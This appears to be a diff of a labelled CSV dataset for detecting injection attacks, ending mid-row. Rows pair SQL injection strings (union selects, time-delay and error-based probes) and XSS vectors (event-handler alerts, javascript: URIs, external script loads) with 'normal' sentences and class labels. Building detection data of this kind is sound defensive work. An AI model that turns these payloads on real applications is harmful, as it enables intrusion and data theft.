onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,2551 -"1' in boolean mode ) or 6979 = like ( 'abcdefg',up",2,SQLi,13302 -Where's the mountain?,0,normal,23518 -Select the right words for the message.,0,normal,24085 -#ERROR!,2,SQLi,10980 -"1"" ) and char ( 111 ) ||char ( 77 ) ||char ( 121 )",2,SQLi,14926 -"1%"" ) or 2367 = ( select count ( * ) from rdb$fiel",2,SQLi,12930 -1' ) where 8142 = 8142 waitfor delay '0:0:5'--,2,SQLi,19673 -"iif ( 2976 = 2976,1,1/0 )",2,SQLi,17535 -"1' in boolean mode ) and row ( 6237,7469 ) > ( sel",2,SQLi,13293 -1 or ( select * from ( select ( sleep ( 5 ) ) ) yd,2,SQLi,12564 +",(select * from (select(sleep(5)))a)",2,SQLi,11144 +"<style>@keyframes slidein {}</style><bdi style=""an",1,XSS,2552 +"-5247"" union all select 3097,3097,3097,3097,3097,3",2,SQLi,13304 +Where's the beach?,0,normal,23515 +"1' ) ) and elt ( 4249 = 4249,7259 ) and ( ( 'xjns'",2,SQLi,18777 +#ERROR!,2,SQLi,10982 +1' ) ) as yyud where 4934 = 4934,2,SQLi,14928 +"-9736' or make_set ( 7311 = 2067,2067 ) and 'czdt'",2,SQLi,12932 +"1"" ) and 5556 = ( select count ( * ) from all_user",2,SQLi,19671 +"-6253' union all select 5756,5756,5756,5756,5756,5",2,SQLi,17533 +1'+ ( select 'gjaq' where 5449 = 5449 and char ( 1,2,SQLi,13295 +"1"" rlike ( select ( case when ( 2724 = 4757 ) then",2,SQLi,12566 <STYLE>@import'http://ha.ckers.org/xss.css';</STYL,1,XSS,816 -"1' ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4",2,SQLi,17405 -<style>:target {color: red;}</style><body id=x sty,1,XSS,7608 -"<dir onkeypress=""alert(1)"" contenteditable>test</d",1,XSS,4088 --2411%' ) ) ) or 6872 = 6872 and ( ( ( '%' = ',2,SQLi,20321 -"-1447"" union all select 3013,3013,3013,3013,3013,3",2,SQLi,19535 -1 ) ) as berd where 5803 = 5803 union all select n,2,SQLi,21424 -Select a quote to live by.,0,normal,24236 -1 ) as phja where 4627 = 4627,2,SQLi,19738 -"-2787' ) ) union all select 1996,1996,1996,1996,19",2,SQLi,22313 -Select your dispute.,0,normal,24911 -<noembed onpointerdown=alert(1)>XSS</noembed>,1,XSS,6923 -<image src=validimage.png onload=alert(1)>,1,XSS,8908 +"-9111"" or 3038 = 3038",2,SQLi,20295 +"<template oncut=""alert(1)"" contenteditable>test</t",1,XSS,7610 +"<noembed onmouseout=""alert(1)"">test</noembed>",1,XSS,4090 +1,0,normal,26711 +"-2568"" ) or ( 8459 = 8459 ) *4906 and ( ""exyw"" = """,2,SQLi,19533 +"1 ) and 3202 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,21422 +Select the right colors for the painting.,0,normal,24233 +"1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71",2,SQLi,19736 +"1"" ) ) ) and ( select 2* ( if ( ( select * from ( ",2,SQLi,22311 +"1"" ) ) ) ( select ( case when ( 4587 = 4587 ) then",2,SQLi,19027 +</script><script>alert('');</script>,1,XSS,6925 +<marquee onblur=alert(1) tabindex=1 id=x></marquee,1,XSS,8910 "<img \x34src=x onerror=""javascript:alert(1)"">",1,XSS,661 -"1"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,18894 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7359 -She'll select her bouquet.,0,normal,24361 --6244' ) as szpd where 8445 = 8445 or 2724 in ( ( ,2,SQLi,18435 --6125'|| ( select 'hwnm' where 1428 = 1428 union a,2,SQLi,18621 -&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&l,1,XSS,1462 -"<span onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,2410 +Select your project.,0,normal,24849 +"<sub onkeydown=""alert(1)"" contenteditable>test</su",1,XSS,7361 +Randomly select a flower.,0,normal,24358 +"1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,18433 +"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,18619 +&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&q,1,XSS,1463 +"<hgroup draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2411 "<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:a",1,XSS,297 -"<nav draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,7549 -<style>@keyframes slidein {}</style><marquee style,1,XSS,7943 -"-7796' ) union all select 4960,4960,4960,4960,4960",2,SQLi,21277 -"<content draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,5790 -"Hit ""Story Settings,"" click ""Hide My Story From"" a",0,normal,26094 -"-9082 union all select 9858,9858,9858,9858,9858,98",2,SQLi,21415 -"-1908"" ) where 6420 = 6420 union all select 6420,6",2,SQLi,17764 -"-2959"" union all select 3414,3414,3414,3414,3414,3",2,SQLi,21594 -"1' ) union all select null,null,null--",2,SQLi,22000 -"-3632' or make_set ( 9354 = 9354,7185 ) and 'lgpy'",2,SQLi,18761 -"1"" ) ) and extractvalue ( 7982,concat ( 0x5c,0x717",2,SQLi,12421 -"1' ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76",2,SQLi,19939 -"#getURL,javascript:alert(1)"",",1,XSS,9856 +<html onpointermove=alert(1)>XSS</html>,1,XSS,7551 +<rtc id=x tabindex=1 onbeforeactivate=alert(1)></r,1,XSS,7945 +Where's the field?,0,normal,23536 +<link onpointerenter=alert(1)>XSS</link>,1,XSS,5792 +Home Depot: Up to 40% off select kitchen and bath ,0,normal,26091 +"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,21413 +"1"" ) ( select ( case when ( 4587 = 4587 ) then reg",2,SQLi,17762 +"-7234"" ) union all select 3154,3154,3154,3154#",2,SQLi,21592 +"1' in boolean mode ) and elt ( 9630 = 4765,4765 ) ",2,SQLi,21998 +"1',exp ( ~ ( select * from ( select concat ( 0x717",2,SQLi,18759 +"-2298%' or 1 group by concat ( 0x7171706a71, ( sel",2,SQLi,12423 +"1%"" or exp ( ~ ( select * from ( select concat ( 0",2,SQLi,19937 +"?javascript:alert(1)"",",1,XSS,9858 "{""id"":null,""firstName"":""Anita"",""lastName"":""Tode"",""",0,normal,27360 -Where's the mindfulness workshop?,0,normal,23657 -"1"" ) ) ) or 5286 = ( select count ( * ) from all_u",2,SQLi,13796 -<var id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,8382 -select sleep ( 5 ) and ( 1435 = 1435,2,SQLi,17116 -"-2857%' ) ) ) union all select 7167,7167,7167,7167",2,SQLi,16862 --4681 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( ,2,SQLi,19732 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,19306 -<dfn id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,4191 -Select your ascend.,0,normal,25030 -"<cite draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,4351 -"<style>@keyframes x{}</style><menu style=""animatio",1,XSS,8742 -1 ) as wiyx where 6515 = 6515,2,SQLi,16376 -"<style>@keyframes x{}</style><base style=""animatio",1,XSS,7631 -She chose a unique gift for her best friend.,0,normal,23766 -<body id=x tabindex=1 onactivate=alert(1)></body>,1,XSS,2724 -We have to listen to the people who select it.,0,normal,25174 -"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,16878 -"-8636"" ) ) ) union all select 1821,1821,1821,1821,",2,SQLi,12460 -&lt;A HREF=&quot;http://0102.0146.0007.00000223/&q,1,XSS,1464 -"<a href=""\xE2\x80\x89javascript:javascript:alert(1",1,XSS,497 -"1"" where 6325 = 6325 union all select null,null,nu",2,SQLi,22136 -AND 1 = utl_inaddr.get_host_address ( ( SELECT hos,2,SQLi,11697 -"<menu draggable=""true"" ondrag=""alert(1)"">test</men",1,XSS,4009 -I need to select the ideal location for the event.,0,normal,23703 -"<blockquote onmouseover=""alert(1)"">test</blockquot",1,XSS,2288 -<svg><aside onload=alert(1)></aside>,1,XSS,8656 -"select * from users where id = 1 or "",&"" or 1 = 1 ",2,SQLi,11983 -"<div id=""98""><div id=d><div style=""font-family:'sa",1,XSS,9158 +1 ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 12,2,SQLi,18513 +1'+ ( select oqvo where 7448 = 7448 union all sele,2,SQLi,13798 +"<em ondblclick=""alert(1)"">test</em>",1,XSS,8384 +Select a quote to inspire.,0,normal,24113 +1 ) as jtfx where 8038 = 8038,2,SQLi,16864 +"1%"" and 2006 = 2006",2,SQLi,22138 +Select maximize.,0,normal,24622 +"<param draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,4193 +Select your rise.,0,normal,25027 +"<multicol onkeypress=""alert(1)"" contenteditable>te",1,XSS,4353 +"<source onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,8744 +-3960' or 9323 = 9323#,2,SQLi,16378 +"<slot onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,7633 +Let's find out where the nearest pharmacy is.,0,normal,23763 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2725 +We write;L 22 = a 1 a 2 .b 1 n-2 b2s 3 n - 3 3 n-3,0,normal,25171 +"-7691"" or 1 group by concat ( 0x7171706a71, ( sele",2,SQLi,16880 +"1"" ) as rnjx where 2679 = 2679 and 2388 = benchmar",2,SQLi,12462 +&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000,1,XSS,1465 +"<a href=""\xE2\x80\x89javascript:javascript:alert(1",1,XSS,497 +"-8919"" or 4747 = dbms_utility.sqlid_to_sqlhash ( (",2,SQLi,22134 +select * from users where id = 1 + ( \+ ) or 1 = 1,2,SQLi,11699 +<style>@keyframes slidein {}</style><footer style=,1,XSS,4011 +"-2340%"" order by 1#",2,SQLi,20118 +"<link draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,2289 +"<address onkeyup=""alert(1)"" contenteditable>test</",1,XSS,8658 +"select * from users where id = '1' union select "";",2,SQLi,11985 +"<div id=""dropbox"" style=""height: 360px;width: 500p",1,XSS,9160 "<style></style\x3E<img src=""about:blank"" onerror=j",1,XSS,445 -ORDER BY 27--,2,SQLi,10269 -<area onpointerover=alert(1)>XSS</area>,1,XSS,8631 +ORDER BY 29--,2,SQLi,10271 +<ins onpointerleave=alert(1)>XSS</ins>,1,XSS,8633 "<img src=x\x10onerror=""javascript:alert(1)"">",1,XSS,673 -"<style>li {list-style-image: url(""javascript:docum",1,XSS,1495 -select pg_sleep ( 5 ) and '%' = ',2,SQLi,18798 --3361'|| ( select 'msfi' where 4806 = 4806 union a,2,SQLi,18414 -<strike id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,5262 -"select * from users where id = 1 or "".."" = 1 or 1 ",2,SQLi,11745 -"<cite onclick=""alert(1)"">test</cite>",1,XSS,3752 -<blink id=x tabindex=1 onfocusin=alert(1)></blink>,1,XSS,2671 -1 ) ) and 3249 = 2985,2,SQLi,15218 -"1"" ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ",2,SQLi,13379 -"<p draggable=""true"" ondragleave=""alert(1)"">test</p",1,XSS,2084 +<img SRC='vbscript:document.vulnerable=true;'>,1,XSS,1496 +Sort results where relevant.,0,normal,23302 +-5031' or 9323 = 9323#,2,SQLi,18412 +"<article onpaste=""alert(1)"" contenteditable>test</",1,XSS,5264 +"select * from users where id = 1 or "";]"" or 1 = 1 ",2,SQLi,11747 +"<style>@keyframes x{}</style><noscript style=""anim",1,XSS,3754 +"<main onmouseleave=""alert(1)"">test</main>",1,XSS,2672 +1' ) as fxuk where 6184 = 6184 and make_set ( 9292,2,SQLi,15220 +"1' union all select null,null#",2,SQLi,13381 +"<meter draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,2085 "<xss onmouseup=""alert(1)"" style=display:block>test",1,XSS,81 -Randomly select a game.,0,normal,24317 -1 ) as lfra where 2669 = 2669 and updatexml ( 3393,2,SQLi,18609 -"1"" ) and elt ( 1889 = 7397,7397 ) and ( ""kuau"" = """,2,SQLi,14151 -"><svg/onload=alert(String.fromCharCode(88,83,83))>",1,XSS,9697 -1 ) where 6725 = 6725 and 1553 = 7419,2,SQLi,14068 -When Massachusetts was called upon to select for S,0,normal,25154 -<object onpointerover=alert(1)>XSS</object>,1,XSS,6573 -"1"" rlike sleep ( 5 ) and ""rylv"" like ""rylv",2,SQLi,21451 +Carefully select your items.,0,normal,24314 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,18842 +"waitfor delay '0:0:5' and ( ( ( ""mfro"" like ""mfro",2,SQLi,14153 +<body onload=alert(/XSS/.source)>,1,XSS,9699 +"-2246"" ) ) union all select 4613,4613,4613,4613,46",2,SQLi,14070 +Randomly select a winner.,0,normal,24429 +"<style>@keyframes slidein {}</style><meta style=""a",1,XSS,6575 +1 ) where 7050 = 7050,2,SQLi,21449 "<a href=""\x1Ejavascript:javascript:alert(1)"" id=""f",1,XSS,538 -"-5891 union all select 7103,7103,7103,7103--",2,SQLi,12701 -"{""id"":null,""name"":""Ivysaur""}",0,normal,27081 +"1' ) ) ) and 8148 = like ( 'abcdefg',upper ( hex (",2,SQLi,12703 +"{""id"":null,""name"":""Greenland Dog""}",0,normal,27078 "</ foo=""><script>javascript:alert(1)</script>"">",1,XSS,647 -"1"" and make_set ( 8403 = 8403,8899 ) and ""bbgg"" = ",2,SQLi,19085 -"1"" ) ) and 4241 = convert ( int, ( select char ( 1",2,SQLi,12483 -"<input draggable=""true"" ondrag=""alert(1)"">test</in",1,XSS,3110 -"At this point, they've all deployed it in some for",0,normal,26339 -"1"" where 8387 = 8387",2,SQLi,20034 -<button onLayoutComplete=javascript:alert(1)>,1,XSS,9625 -"1"" ) ) as ynuw where 9138 = 9138",2,SQLi,14936 -"-9587 union all select 1568,1568,1568,1568,1568,15",2,SQLi,21419 -1'|| ( select 'vwls' where 5252 = 5252 rlike sleep,2,SQLi,20605 -"<optgroup onkeydown=""alert(1)"" contenteditable>tes",1,XSS,8525 -<body onblur=alert(1) id=x><iframe id=x>,1,XSS,3031 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2103 -></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,1,XSS,9555 -1 ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 1233 =,2,SQLi,20687 -"<dl oncopy=""alert(1)"" contenteditable>test</dl>",1,XSS,7146 -"Select one of the bubbles, and then click ""Continu",0,normal,25616 -"<th onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,3892 -"-1559 union all select 3985,3985,3985,3985#",2,SQLi,17503 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,1996 -Select your application.,0,normal,24943 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10787 -"<aside onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,4926 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4976 -Select the perfect gift.,0,normal,22607 -_http://danlec_@.1 style=background-image:url(data,1,XSS,9423 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10640 -"<plaintext oncopy=""alert(1)"" contenteditable>test<",1,XSS,2979 -<script id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,3574 -<s onpointerenter=alert(1)>XSS</s>,1,XSS,7373 -Guys your start your league of four is a TEAMGAME ,0,normal,26494 -Select a yoga pose to practice.,0,normal,24247 -"<form><button formaction=""javascript:alert(123)"">c",1,XSS,1116 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,13016 -<spacer id=x tabindex=1 onfocus=alert(1)></spacer>,1,XSS,3089 -1' in boolean mode ) and 5556 = ( select count ( *,2,SQLi,13786 -<details onpointerup=alert(1)>XSS</details>,1,XSS,3467 -Select the right path for your path.,0,normal,24225 -"-8929%' ) union all select 9486,9486,9486,9486#",2,SQLi,13748 -Where's the carnival?,0,normal,23586 --6217 ) ) as hyws where 3441 = 3441 or 9421 = 4695,2,SQLi,13263 -"1"" ) and ( select 9067 from ( select count ( * ) ,",2,SQLi,17173 -"<nav draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,8233 -select sleep ( 5 ) ) ||',2,SQLi,14962 -"<strong onkeypress=""alert(1)"" contenteditable>test",1,XSS,7625 -"-1048%"" or 3038 = 3038",2,SQLi,14482 -"<basefont draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,7026 +1' and 3754 = ( select upper ( xmltype ( chr ( 60 ,2,SQLi,19083 +1' ) ) or 8421 = ( select count ( * ) from generat,2,SQLi,12485 +<applet onpointerover=alert(1)>XSS</applet>,1,XSS,3111 +"{""id"":null,""firstName"":""Subramanian"",""lastName"":""B",0,normal,27040 +Select the best candidate.,0,normal,22560 +<button onLoseCapture=javascript:alert(1)>,1,XSS,9627 +"1%"" and ( 3020 = 3020 ) *6703 and ""%"" = """,2,SQLi,14938 +"-9884' ) or elt ( 1942 = 8409,8409 ) and ( 'tqdq' ",2,SQLi,21417 +"1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642",2,SQLi,20603 +<map onpointerup=alert(1)>XSS</map>,1,XSS,8527 +"<progress onmouseup=""alert(1)"">test</progress>",1,XSS,3032 +"<command onclick=""alert(1)"">test</command>",1,XSS,2104 +"><img src=x:x"" onerror=""alert(XSS)"">",1,XSS,9557 +"1"" ) ) and ( select 9067 from ( select count ( * )",2,SQLi,19893 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7148 +Select project team Work with specialist support w,0,normal,25613 +<rt onpointerover=alert(1)>XSS</rt>,1,XSS,3894 +"-8550"" ) or 2724 in ( ( char ( 113 ) +char ( 113 )",2,SQLi,17501 +"<nextid onclick=""alert(1)"">test</nextid>",1,XSS,1997 +Select your plea.,0,normal,24940 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10789 +<title id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,4928 +"<legend onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,4978 +Aggregate data where needed.,0,normal,23288 +[a](javascript:this;alert(1)),1,XSS,9425 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10642 +<form id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,2980 +"<embed onmouseover=""alert(1)"">test</embed>",1,XSS,3576 +"<table oncopy=""alert(1)"" contenteditable>test</tab",1,XSS,7375 +Modi and his government do not have the courage to,0,normal,26491 +Select your power.,0,normal,24872 +<frameset onload=alert(123)>,1,XSS,1117 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13018 +"<article onbeforecut=""alert(1)"" contenteditable>te",1,XSS,3090 +"1%' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,13788 +<html id=x tabindex=1 onfocusin=alert(1)></html>,1,XSS,3469 +1' ) ) and 3707 = ( select count ( * ) from sysibm,2,SQLi,17331 +"-2570"" or 1570 = convert ( int, ( select char ( 11",2,SQLi,13750 +"1%"" ) ) ) and 6414 = ( select count ( * ) from rdb",2,SQLi,21469 +select pg_sleep ( 5 ) and ( 'aydg' = 'aydg,2,SQLi,13265 +-1641' ) ) or 4144 = ( select upper ( xmltype ( ch,2,SQLi,17171 +<isindex id=x tabindex=1 onfocus=alert(1)></isinde,1,XSS,8235 +"1"" where 5796 = 5796 and sleep ( 5 ) #",2,SQLi,14964 +"<i onmouseleave=""alert(1)"">test</i>",1,XSS,7627 +"1"" ) ) as qhnb where 8302 = 8302 and ( 3020 = 3020",2,SQLi,14484 +<svg><abbr onload=alert(1)></abbr>,1,XSS,7028 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>,1,XSS,800 -"1"" and 4241 = convert ( int, ( select char ( 113 )",2,SQLi,20886 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,20884 `><p><svg><script>a='hello\x27;javascript:alert(1),1,XSS,428 -select,0,normal,26627 -Join tables where needed.,0,normal,23475 -They select the winner.,0,normal,24469 -1'+ ( select 'sfko' where 6853 = 6853 rlike sleep ,2,SQLi,14839 -1'+ ( select gblp where 6768 = 6768,2,SQLi,18820 --7426' order by 1#,2,SQLi,14185 -Select your research.,0,normal,24992 -Select the perfect accessory for the outfit.,0,normal,24029 -1 ) as ktfu where 2637 = 2637,2,SQLi,20779 -FALSE,0,normal,23240 -1,0,normal,26727 -select * from users where id = 1 <@$_ union select,2,SQLi,11499 -<tbody onpointerup=alert(1)>XSS</tbody>,1,XSS,7635 +select,0,normal,26624 +"1%' or elt ( 6272 = 6272,sleep ( 5 ) ) and '%' = '",2,SQLi,18198 +-2303' ) ) as exyt where 2528 = 2528 or 8571 = 857,2,SQLi,17565 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14841 +1'|| ( select 'frrk' from dual where 3145 = 3145 a,2,SQLi,18818 +-9264' ) or 8571 = 8571--,2,SQLi,14187 +Create a unique painting.,0,normal,22639 +"1"" ) as aifd where 5962 = 5962",2,SQLi,22206 +1' ) where 8128 = 8128,2,SQLi,20777 +1' ) ) ) and 8514 = ( select count ( * ) from doma,2,SQLi,18544 +1,0,normal,26724 +"select * from users where id = 1 or "",{"" or 1 = 1 ",2,SQLi,11501 +"<del onpaste=""alert(1)"" contenteditable>test</del>",1,XSS,7637 "<iframe src=""data:text/html,<img src=1 onerror=ale",1,XSS,233 -1%' ) ) ) or 4915 = ( select count ( * ) from doma,2,SQLi,21308 -1 where 5099 = 5099 and 8312 = dbms_pipe.receive_m,2,SQLi,19277 -"1"" ) ) as zgig where 5748 = 5748 and 6055 = ctxsys",2,SQLi,17992 -I'll select the wine.,0,normal,24266 -<li id=x tabindex=1 ondeactivate=alert(1)></li><in,1,XSS,7424 -Select navigate.,0,normal,24654 -1 where 8889 = 8889,2,SQLi,15983 -"<input ondblclick=""alert(1)"">test</input>",1,XSS,4024 -"{""id"":null,""firstName"":""Ab"",""lastName"":""Rahim"",""ad",0,normal,27017 -<embed id=x onfocus=alert(1) type=text/html>,1,XSS,5370 -Delete outdated posts from your social media.,0,normal,22958 -"1' union all select null,null,null,null,null,null,",2,SQLi,19872 -"-1303' union all select 4840,4840#",2,SQLi,17995 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6885 -You only have two options to select.,0,normal,25068 --9514 ) ) as xdkw where 4975 = 4975 union all sele,2,SQLi,12289 -1' where 4460 = 4460,2,SQLi,13188 -<dir id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,7903 -( select ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ),2,SQLi,22212 -<applet onpointerleave=alert(1)>XSS</applet>,1,XSS,8217 -"union (select NULL, NULL, NULL, NULL, (select @@ve",2,SQLi,10052 -"Be careful which breed you select, because althoug",0,normal,26335 -"<main draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,3884 -<bgsound onblur=alert(1) tabindex=1 id=x></bgsound,1,XSS,4413 -<main onpointerenter=alert(1)>XSS</main>,1,XSS,2315 -1' ) and 8514 = ( select count ( * ) from domain.d,2,SQLi,12835 -ORDER BY 12,2,SQLi,10316 -Select bistro.,0,normal,24538 -"<style>:target {color:red;}</style><a id=x style=""",1,XSS,7413 -1 where 1636 = 1636 and 6240 = ( 'qqpjq'|| ( selec,2,SQLi,17519 -"Open Photoshop CC 2020 and select ""Open"" and then ",0,normal,25816 -end and ( ( ( 'nhub' = 'nhub,2,SQLi,15943 -"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,18675 -<style>@keyframes slidein {}</style><strong style=,1,XSS,4834 -1'+ ( select 'midn' where 2819 = 2819 or 9643 = ( ,2,SQLi,17776 -1 ) as ndgd where 2367 = 2367 or 8156 = ( select c,2,SQLi,13419 -"<input type=image src onerror=""prompt(1)"">",1,XSS,9451 -<style>@keyframes slidein {}</style><iframe style=,1,XSS,3425 -Join the hiking expedition.,0,normal,22590 -<button onFocusOut=javascript:alert(1)>,1,XSS,9618 -<b onpointermove=alert(1)>XSS</b>,1,XSS,5948 -"{""id"":null,""name"":""chemical""}",0,normal,27245 -1 ) as hlit where 4973 = 4973 procedure analyse ( ,2,SQLi,15258 -"{""id"":null,""firstName"":""Khairul"",""lastName"":""Ashab",0,normal,27175 -"{""id"":null,""name"":""Dragonfly""}",0,normal,27284 -"<strong onmouseleave=""alert(1)"">test</strong>",1,XSS,8210 +-8639 ) or 8138 = 6252,2,SQLi,21306 +1' in boolean mode ) and 3754 = ( select upper ( x,2,SQLi,19275 +"-1197"" ) ) as dfsy where 8857 = 8857 or 3038 = 303",2,SQLi,19497 +Randomly select a song.,0,normal,24263 +"<image draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,7426 +Select journey.,0,normal,24651 +"-9873"" union all select 8020,8020,8020,8020,8020,8",2,SQLi,15985 +<base id=x tabindex=1 onfocus=alert(1)></base>,1,XSS,4026 +"{""id"":null,""name"":""hang""}",0,normal,27014 +"<select ondblclick=""alert(1)"">test</select>",1,XSS,5372 +Where did you find that rare book?,0,normal,22955 +"1%"" ) or 5286 = ( select count ( * ) from all_user",2,SQLi,17928 +1' ) rlike ( select ( case when ( 7689 = 7689 ) th,2,SQLi,17324 +<svg><footer onload=alert(1)></footer>,1,XSS,6887 +"You use the app to select its position, orientatio",0,normal,25065 +1 and 6537 = dbms_pipe.receive_message ( chr ( 76 ,2,SQLi,12291 +-3595'+ ( select vppx where 6018 = 6018 union all ,2,SQLi,13190 +"AllowScriptAccess=""always""",1,XSS,7905 +"-9630%"" union all select 8592,8592,8592,8592--",2,SQLi,20788 +"<u onmouseup=""alert(1)"">test</u>",1,XSS,8219 +1 exec sp_ (or exec xp_),2,SQLi,10054 +1'+ ( select 'jaok' where 2592 = 2592,2,SQLi,18754 +"<meta draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,3886 +"<u onbeforepaste=""alert(1)"" contenteditable>test</",1,XSS,4415 +"<style>@keyframes x{}</style><h1 style=""animation-",1,XSS,2316 +1 where 6223 = 6223 rlike sleep ( 5 ) #,2,SQLi,12837 +ORDER BY 14,2,SQLi,10318 +Select cuisine.,0,normal,24535 +<th onblur=alert(1) tabindex=1 id=x></th><input au,1,XSS,7415 +I'm thinking of where to go for some relaxation.,0,normal,23932 +Select your favorite color.,0,normal,24258 +1' ) ) as sjzf where 9997 = 9997 and 4193 = 5408,2,SQLi,15945 +1'+ ( select 'stdl' where 4581 = 4581,2,SQLi,18673 +"<spacer onkeyup=""alert(1)"" contenteditable>test</s",1,XSS,4836 +"-4606"" ) as elek where 8261 = 8261 or 8571 = 8571-",2,SQLi,18864 +"-4669"" or 8571 = 8571--",2,SQLi,13421 +<img src='1' onerror='alert(0)' <,1,XSS,9453 +<xmp id=x tabindex=1 onfocus=alert(1)></xmp>,1,XSS,3427 +Where's the missing keychain?,0,normal,22587 +<button onHelp=javascript:alert(1)>,1,XSS,9620 +"<track onmousedown=""alert(1)"">test</track>",1,XSS,5950 +"{""id"":null,""firstName"":""Cheong"",""lastName"":""Meng"",",0,normal,27243 +1' ) where 1502 = 1502 and 3754 = ( select upper (,2,SQLi,15260 +"{""id"":null,""name"":""means""}",0,normal,27173 +Insert the USB drive.,0,normal,22579 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8212 "></SCRIPT>"">'><SCRIPT>alert(String.fromCharCode(88",1,XSS,798 -"<fieldset oncopy=""alert(1)"" contenteditable>test</",1,XSS,1884 -"<IMG SRC=x ondblclick=""alert(String.fromCharCode(8",1,XSS,1199 -"1"" ) where 8878 = 8878 or ( select 9173 from ( sel",2,SQLi,19512 -"<rp onmouseenter=""alert(1)"">test</rp>",1,XSS,2794 -"1"" ) where 5828 = 5828 or 8384 = like ( 'abcdefg',",2,SQLi,21132 -1'+ ( select biqo where 6046 = 6046,2,SQLi,18456 --4699 ) as mymz where 3405 = 3405 or elt ( 1032 = ,2,SQLi,16865 -<svg><listing onload=alert(1)></listing>,1,XSS,7127 -Order a delicious pizza.,0,normal,22555 -"-9725 ) where 9068 = 9068 or elt ( 4723 = 1426,142",2,SQLi,13766 -<table onpointerdown=alert(1)>XSS</table>,1,XSS,8262 -<s onblur=alert(1) tabindex=1 id=x></s><input auto,1,XSS,4356 -It was almost necessary that he should select what,0,normal,25953 -&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&q,1,XSS,1421 -"<tt onbeforecut=""alert(1)"" contenteditable>test</t",1,XSS,5206 -"<IMG SRC=x onstalled=""alert(String.fromCharCode(88",1,XSS,1235 -"If you need to delete files, tap on Select, select",0,normal,26046 -"<script src=""http://code.jquery.com/jquery-1.4.4.j",1,XSS,9256 -1' ) or 8421 = ( select count ( * ) from generate_,2,SQLi,16815 -Select your fluctuate.,0,normal,25042 -<br onpointerover=alert(1)>XSS</br>,1,XSS,2329 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,16612 -"1"" ) ) and sleep ( 5 ) and ( ( ""timv"" = ""timv",2,SQLi,17336 -"1"" ) ) ) waitfor delay '0:0:5' and ( ( ( ""ckht"" = ",2,SQLi,21497 -"1%"" union all select null--",2,SQLi,16962 -<menuitem onpointerout=alert(1)>XSS</menuitem>,1,XSS,4234 +<basefont onpointerup=alert(1)>XSS</basefont>,1,XSS,1885 +"<IMG SRC=x onmousedown=""alert(String.fromCharCode(",1,XSS,1200 +"-3321"" where 1603 = 1603 union all select 1603,160",2,SQLi,19510 +<style>:target {color:red;}</style><figure id=x st,1,XSS,2795 +-9522 ) as lraw where 9472 = 9472 or ( 4087 = 8213,2,SQLi,21130 +"1 where 2914 = 2914 union all select null,null,nul",2,SQLi,18454 +"1%"" ) ) and 